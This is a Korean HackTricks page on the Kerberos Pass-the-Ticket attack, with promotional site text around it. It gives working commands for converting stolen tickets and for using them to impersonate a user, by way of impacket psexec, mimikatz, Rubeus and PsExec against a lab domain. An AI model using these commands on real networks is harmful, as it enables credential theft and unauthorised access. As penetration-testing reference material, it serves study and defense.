Korean - Ht
HackTricks Training Twitter Linkedin Sponsor

Pass the Ticket

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 워크플로우를 쉽게 구축하고 자동화하세요. 오늘 바로 액세스하세요:

티켓 전달 (PTT)

티켓 전달 (PTT) 공격 방법에서 공격자는 사용자의 인증 티켓을 도용하여 비밀번호나 해시 값 대신 사용합니다. 이 도난당한 티켓은 그 후 사용자를 가장하는 데 사용되어 네트워크 내의 리소스 및 서비스에 무단 액세스를 얻습니다.

읽기:

Linux와 Windows 티켓 간의 플랫폼 간 교환

ticket_converter 도구는 티켓 자체와 출력 파일을 사용하여 티켓 형식을 변환합니다.

python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache => kirbi

python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi => ccache

패스 더 티켓 공격

Windows에서 Kekeo를 사용할 수 있습니다.

Linux
export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
Windows
#Load the ticket in memory using mimikatz or Rubeus
mimikatz.exe "kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi"
.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi
klist #List tickets in cache to cehck that mimikatz has loaded the ticket
.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

참고 자료

Trickest를 사용하여 세계에서 가장 고급 커뮤니티 도구로 구동되는 자동화된 워크플로우를 쉽게 구축하세요. 오늘 바로 액세스하세요:

제로부터 영웅이 될 때까지 AWS 해킹을 배우세요 htARTE (HackTricks AWS Red Team Expert)!

HackTricks를 지원하는 다른 방법:

PreviousOver Pass the Hash/Pass the KeyNextPassword Spraying / Brute Force

Last updated